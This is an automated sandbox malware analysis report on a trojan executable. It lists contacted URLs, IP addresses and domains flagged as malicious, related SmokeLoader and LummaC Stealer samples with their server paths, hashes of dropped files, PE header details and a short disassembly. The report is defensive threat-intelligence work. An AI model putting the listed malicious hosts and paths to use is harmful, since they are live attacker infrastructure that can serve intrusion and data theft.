              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.msn.com/explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://outlook.com_explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              45.130.41.250
              browserupdater.comRussian Federation
              198610BEGET-ASRUtrue
              190.187.52.42
              unknownPeru
              19180AMERICATELPERUSAPEtrue
              188.114.97.3
              mundoparachicas.spaceEuropean Union
              13335CLOUDFLARENETUSfalse
              58.151.148.90
              mzxn.ruKorea Republic of
              17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
              185.149.100.242
              mussangroup.comTurkey
              209853VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLitrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1488759
              Start date and time:2024-08-06 14:47:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 10s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:n72I7qB2ss.exe
              renamed because original name is a hash value
              Original Sample Name:0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@7/4@9/5
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              08:48:23API Interceptor531713x Sleep call for process: explorer.exe modified
              08:49:07API Interceptor11x Sleep call for process: 70C1.exe modified
              08:49:14API Interceptor11x Sleep call for process: AA31.exe modified
              13:48:24Task SchedulerRun new task: Firefox Default Browser Agent 342508018A16E33C path: C:\Users\user\AppData\Roaming\ashcvvs
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              45.130.41.2503d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  190.187.52.42UMcwGj36Oj.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 100xmargin.com/tmp/index.php
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • dbfhns.in/tmp/index.php
                  rBwTlpgnjc.exeGet hashmaliciousSmokeLoaderBrowse
                  • nidoe.org/tmp/index.php
                  SSDAIG33Zh.exeGet hashmaliciousBabuk, DjvuBrowse
                  • sdfjhuz.com/dl/build2.exe
                  file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                  • habrafa.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                  fnKtfdi0P0.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc, XmrigBrowse
                  • emgvod.com/uploads/logo3.jpg
                  O1yQjHheL6.exeGet hashmaliciousAmadey, PureLog Stealer, SmokeLoaderBrowse
                  • emgvod.com/uploads/logo3.jpg
                  Oa5MQwNPBq.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                  • habrafa.com/test1/get.php?pid=589A025AAF5058B231B95CD1C4770414
                  fcdf869bc179759c8be3093adec60b334d25cad63b78fd3d28229b0af88b765b_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • sjyey.com/tmp/index.php
                  Qkk9UKA1cW.exeGet hashmaliciousSmokeLoaderBrowse
                  • gxutc2c.com/tmp/index.php
                  188.114.97.3RFQ-HL51L05.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • www.alphacentura.com/mnr7/
                  MV MAXIMApdf.exeGet hashmaliciousLokibotBrowse
                  • werdotx.shop/DOT/PWS/fre.php
                  X5DJaKj0aB.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, zgRATBrowse
                  • sogaz.top/externaleternalpollSecureHttplowBigloadserverDefaultwordpress.php
                  yvZeCiq7c7.exeGet hashmaliciousDCRat, Kobalos, PureLog Stealer, zgRATBrowse
                  • 417668cm.nyashka.top/AsyncWordpressDatalifepublictempuploads.php
                  B7LYVhSNq5.exeGet hashmaliciousFormBookBrowse
                  • www.olxelang.com/pt46/?_8IP4=OfYMvDyLN+e6cInm/HJC5WJEdvRWYWLcI0NKQgEj6DlgocxuvjjaCYhDBBKWB9e1E+dnyiuBGA==&FTTX=5jUhq8o0GVi
                  SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                  • www.alphacentura.com/mnr7/
                  QUOTATION.exeGet hashmaliciousFormBookBrowse
                  • www.aggame.asia/0dmj/
                  Shipment Files EG240711& EG240712.exeGet hashmaliciousFormBookBrowse
                  • www.bbyul.shop/1i58/
                  EG240711 EG240712.xlsGet hashmaliciousSnake KeyloggerBrowse
                  • sini.la/mgz8n
                  v9.exeGet hashmaliciousUnknownBrowse
                  • www.htdlq.com/bmd.txt
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  mussangroup.com3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • 185.149.100.242
                  kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  rFdy6Oh3xT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  kjR9pmEPvT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  UMcwGj36Oj.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  I5PInhLzA0.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  45oPcWSKOp.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  jvR4ju7uPW.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  file.exeGet hashmaliciousLummaC, DanaBot, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                  • 185.149.100.242
                  mzxn.ru3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • 109.98.58.98
                  kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 186.182.55.44
                  rFdy6Oh3xT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 211.171.233.129
                  kjR9pmEPvT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 130.204.29.121
                  UMcwGj36Oj.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 148.230.249.9
                  I5PInhLzA0.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 201.103.170.60
                  45oPcWSKOp.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 190.159.30.35
                  jvR4ju7uPW.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 211.168.53.110
                  file.exeGet hashmaliciousLummaC, DanaBot, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 189.143.145.10
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                  • 211.168.53.110
                  browserupdater.com3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • 45.130.41.250
                  kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 45.130.41.250
                  mundoparachicas.space3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • 188.114.96.3
                  kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 188.114.97.3
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  POWERVIS-AS-KRLGPOWERCOMMKR154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                  • 116.40.18.75
                  154.216.17.9-skid.m68k-2024-08-04T06_23_08.elfGet hashmaliciousMirai, MoobotBrowse
                  • 49.172.146.82
                  154.216.17.9-skid.sh4-2024-08-04T06_23_11.elfGet hashmaliciousMirai, MoobotBrowse
                  • 122.37.123.241
                  77.90.35.9-skid.arm5-2024-07-30T07_10_52.elfGet hashmaliciousMirai, MoobotBrowse
                  • 125.179.148.16
                  77.90.35.9-skid.ppc-2024-07-30T07_10_49.elfGet hashmaliciousMirai, MoobotBrowse
                  • 124.49.75.113
                  77.90.35.9-skid.x86-2024-07-30T07_10_50.elfGet hashmaliciousMirai, MoobotBrowse
                  • 49.172.146.94
                  botx.m68k.elfGet hashmaliciousMiraiBrowse
                  • 115.136.141.71
                  unLc6VekkL.elfGet hashmaliciousMiraiBrowse
                  • 125.185.11.125
                  17nDkQW4tK.elfGet hashmaliciousMiraiBrowse
                  • 49.171.222.120
                  2PQz3l61Pc.elfGet hashmaliciousMiraiBrowse
                  • 115.143.142.76
                  CLOUDFLARENETUSProforma.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.97.3
                  https://us-phishalarm-ewt.proofpoint.com/EWT/v1/PxtyCg5I!wMP6u0jXBvV8e-tqeNPui97fkKF8-fxPIfMNT6FnxOb4axN3MBDo2o5Hp3O0YcjjbcGiNO_yGyqqrwuWoK_V2vj0xl71cwQ4AztkJS6lP6-5bdPjdWGpeLMhsF1GqQ$Get hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  2.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                  • 188.114.96.3
                  https://form.asana.com/?k=4CXtmX3TL4hciUOIomfxgQ&d=1207815429321009Get hashmaliciousUnknownBrowse
                  • 104.18.86.42
                  securedoc_20240805T101719.htmlGet hashmaliciousUnknownBrowse
                  • 104.17.25.14
                  Purchase order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 66.235.200.146
                  https://ugo.65d.mywebsitetransfer.com/mm-dk/dk/post.phpGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  AGENDA.pdfGet hashmaliciousHTMLPhisherBrowse
                  • 162.159.138.60
                  Itv FET91.pdfGet hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  6PHM9GG3zOACOOY.exeGet hashmaliciousLummaCBrowse
                  • 104.21.78.169
                  BEGET-ASRU3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • 45.130.41.250
                  kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 45.130.41.250
                  02iEELiLVH.exeGet hashmaliciousDCRatBrowse
                  • 5.101.153.57
                  UhotTqFePp.exeGet hashmaliciousDCRatBrowse
                  • 5.101.153.31
                  Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                  • 5.101.153.2
                  https://sc.link/sdqadGet hashmaliciousUnknownBrowse
                  • 45.130.41.121
                  QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                  • 5.101.153.57
                  yx18iwwPFF.exeGet hashmaliciousDCRatBrowse
                  • 5.101.153.57
                  Fake Intel (1).exeGet hashmaliciousFareit, KeliosBrowse
                  • 31.129.99.189
                  http://relsoftware.comGet hashmaliciousHTMLPhisherBrowse
                  • 87.236.16.245
                  AMERICATELPERUSAPEUMcwGj36Oj.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 190.187.52.42
                  arm4.elfGet hashmaliciousMiraiBrowse
                  • 148.102.14.0
                  5QQrnIBRTm.elfGet hashmaliciousMiraiBrowse
                  • 190.187.45.121
                  BNd5XPrLzR.elfGet hashmaliciousMirai, MoobotBrowse
                  • 190.187.228.241
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 190.187.52.42
                  rBwTlpgnjc.exeGet hashmaliciousSmokeLoaderBrowse
                  • 190.187.52.42
                  E8zldNa4ks.elfGet hashmaliciousUnknownBrowse
                  • 190.187.188.187
                  SSDAIG33Zh.exeGet hashmaliciousBabuk, DjvuBrowse
                  • 190.187.52.42
                  6A9jBmgfEz.elfGet hashmaliciousMiraiBrowse
                  • 190.187.132.110
                  4JJkk655SP.elfGet hashmaliciousUnknownBrowse
                  • 190.187.141.172
                  VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • 185.149.100.242
                  kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  rFdy6Oh3xT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  kjR9pmEPvT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  UMcwGj36Oj.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  I5PInhLzA0.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  45oPcWSKOp.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  jvR4ju7uPW.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  file.exeGet hashmaliciousLummaC, DanaBot, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 185.149.100.242
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                  • 185.149.100.242
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e12.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  6PHM9GG3zOACOOY.exeGet hashmaliciousLummaCBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  Tweak.regGet hashmaliciousLummaCBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  4.exeGet hashmaliciousBlackMoonBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  Nuova immagine bitmap (2).jsGet hashmaliciousUnknownBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  SecuriteInfo.com.Trojan.GenericKD.73789174.3679.22650.xlsxGet hashmaliciousUnknownBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  [SUSPICIOUS ATTACHMENT] Fwd_ Status Update_ Download Statement.emlGet hashmaliciousAsyncRATBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  installer.exeGet hashmaliciousLummaCBrowse
                  • 45.130.41.250
                  • 188.114.97.3
                  • 185.149.100.242
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\70C1.exe3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                    kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                      C:\Users\user\AppData\Local\Temp\AA31.exe3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exeGet hashmaliciousSmokeLoaderBrowse
                        kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                          Process:C:\Windows\explorer.exe
                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                          Category:dropped
                          Size (bytes):2064896
                          Entropy (8bit):6.707727290324826
                          Encrypted:false
                          SSDEEP:49152:YH4XAU8bMoLZcZQCO/Vi2QYeuGHUsbCepRDmoMKdP8ub48f0jJvsMcpF3mXLq:G4PU2nxmozdUjJ7
                          MD5:2B113C0906841F9AEAAFBD43C7CD37C4
                          SHA1:BF8EAF8AFD8DF8531935B3152AF862AB204BBCA3
                          SHA-256:910E7F453F7842758E874A6AC98301F157E4EA6F9C6CA8A8E2AC0983D03D989B
                          SHA-512:486A5AC4F88818D3DD593723E076FADDD677676062415800E0D9BA8650AC0737F2DCE427AC34BAE1F681C54E3FDD253F28032BE707C305F4E7DFBBEBFA844C0D
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 32%
                          Joe Sandbox View:
                          • Filename: 3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exe, Detection: malicious, Browse
                          • Filename: kMN7AGke8h.exe, Detection: malicious, Browse
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...[a.f.................d...~...`.............@.............................P&.....*.....`... ...............................................&. ....0&.8........[...........@&.................................(.....................&.P............................text....c.......d..................`..`.data...0............h..............@....rdata..x....P.......0..............@..@.pdata...[.......\..................@..@.xdata..TG...P...H...(..............@..@.bss.....^...............................idata.. .....&......p..............@....CRT....X.....&......x..............@....tls......... &......z..............@....rsrc...8....0&......|..............@..@.reloc.......@&......~..............@..B........................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                          Category:modified
                          Size (bytes):2097152
                          Entropy (8bit):6.715421894829642
                          Encrypted:false
                          SSDEEP:49152:wv9EtY/18WmXsQyVOwJoNWu1vCHdrWTz+pmjjhnlQD38kF:uWm8sQF1vCMe
                          MD5:85B1854B81D15AC9116AA200304D7CA0
                          SHA1:0FE99B5F0DE3C371CC1E1C5688B5F04E9DAB038F
                          SHA-256:F1530D12529D8B0ED379457FEEE1A7CFC223596F455EA0D0771F414699BC88F5
                          SHA-512:663154AD674325045457DD5C68F75B4FC9CA61C205E704BBABC1F74BDE0DA39606515DBB30CBE40EEEFA1B2D99A964D0CAC5210D532BB05DDDF15B969F2E1BDB
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 54%
                          Joe Sandbox View:
                          • Filename: 3d1e4d1c9809518ecedf055b584f7ffb4c5b9aa080a03e3b80a118d2422104da_dump.exe, Detection: malicious, Browse
                          • Filename: kMN7AGke8h.exe, Detection: malicious, Browse
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....`.f.........................`.............@..............................&....... ...`... ...............................................&.H.....&.8....p...\............&............................. d..(.....................&.X............................text...H...........................`..`.data...............................@....rdata..............................@..@.pdata...\...p...^...H..............@..@.xdata..$G.......H..................@..@.bss.....^... ..........................idata..H.....&.....................@....CRT....X.....&.....................@....tls..........&.....................@....rsrc...8.....&.....................@..@.reloc........&.....................@..B........................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):215552
                          Entropy (8bit):5.654048426178871
                          Encrypted:false
                          SSDEEP:3072:tmLAnD4GokA3ZEUBSC6P0xcFlADN5Ld8Hi+Cx5Fj:ELAnsGokA36iwFlADNsLqj
                          MD5:A3F7B743EFAB28654F201A43A0E349C5
                          SHA1:58C7B963CBCDBF5837109E80693D77E32AC6D150
                          SHA-256:0A37CE10735D313FF079296125F25EE90A74FDB5AA87D9B5F1642998C62CF05E
                          SHA-512:C93DDA7FDFD93B990B3C963E664D11AB32B39F30D44B9FD7CCB270E79DC2D6EF3C4A16543DDB9801532969E6D95F378891C7BD5E6245500A724B28326401B62C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 71%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@..%..@v..@v..@v...v..@v...v$.@v...v..@v...vv.@v#.;v..@v..Av|.@v...v..@v...v..@v...v..@vRich..@v........PE..L...:P.e.................^...................p....@.........................................................................|...<.......8............................................................................p...............................text....].......^.................. ..`.rdata...#...p...$...b..............@..@.data...|&......."..................@....rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):5.654048426178871
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:n72I7qB2ss.exe
                          File size:215'552 bytes
                          MD5:a3f7b743efab28654f201a43a0e349c5
                          SHA1:58c7b963cbcdbf5837109e80693d77e32ac6d150
                          SHA256:0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e
                          SHA512:c93dda7fdfd93b990b3c963e664d11ab32b39f30d44b9fd7ccb270e79dc2d6ef3c4a16543ddb9801532969e6d95f378891c7bd5e6245500a724b28326401b62c
                          SSDEEP:3072:tmLAnD4GokA3ZEUBSC6P0xcFlADN5Ld8Hi+Cx5Fj:ELAnsGokA36iwFlADNsLqj
                          TLSH:AD247CA17691D03DCC9B83F54E79E6A42736BC6157B1818F72A83F6F59332A006AD3C1
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@..%..@v..@v..@v...v..@v...v$.@v...v..@v...vv.@v#.;v..@v..Av|.@v...v..@v...v..@v...v..@vRich..@v........PE..L...:P.e...........
                          Icon Hash:738733b18b8b83cc
                          Entrypoint:0x40158e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x659A503A [Sun Jan 7 07:18:18 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:fd7107097d7d4c710186b83074e69309
                          Instruction
                          call 00007FD448808602h
                          jmp 00007FD44880487Eh
                          mov edi, edi
                          push ebp
                          mov ebp, esp
                          sub esp, 00000328h
                          mov dword ptr [0042BBF8h], eax
                          mov dword ptr [0042BBF4h], ecx
                          mov dword ptr [0042BBF0h], edx
                          mov dword ptr [0042BBECh], ebx
                          mov dword ptr [0042BBE8h], esi
                          mov dword ptr [0042BBE4h], edi
                          mov word ptr [0042BC10h], ss
                          mov word ptr [0042BC04h], cs
                          mov word ptr [0042BBE0h], ds
                          mov word ptr [0042BBDCh], es
                          mov word ptr [0042BBD8h], fs
                          mov word ptr [0042BBD4h], gs
                          pushfd
                          pop dword ptr [0042BC08h]
                          mov eax, dword ptr [ebp+00h]
                          mov dword ptr [0042BBFCh], eax
                          mov eax, dword ptr [ebp+04h]
                          mov dword ptr [0042BC00h], eax
                          lea eax, dword ptr [ebp+08h]
                          mov dword ptr [0042BC0Ch], eax
                          mov eax, dword ptr [ebp-00000320h]
                          mov dword ptr [0042BB48h], 00010001h
                          mov eax, dword ptr [0042BC00h]
                          mov dword ptr [0042BAFCh], eax
                          mov dword ptr [0042BAF0h], C0000409h
                          mov dword ptr [0042BAF4h], 00000001h
                          mov eax, dword ptr [0042A004h]
                          mov dword ptr [ebp-00000328h], eax
                          mov eax, dword ptr [0042A008h]
                          mov dword ptr [ebp-00000324h], eax
                          call dword ptr [000000B4h]
                          Programming Language:
                          • [C++] VS2008 build 21022
                          • [ASM] VS2008 build 21022
                          • [ C ] VS2008 build 21022
                          • [IMP] VS2005 build 50727
                          • [RES] VS2008 build 21022
                          • [LNK] VS2008 build 21022
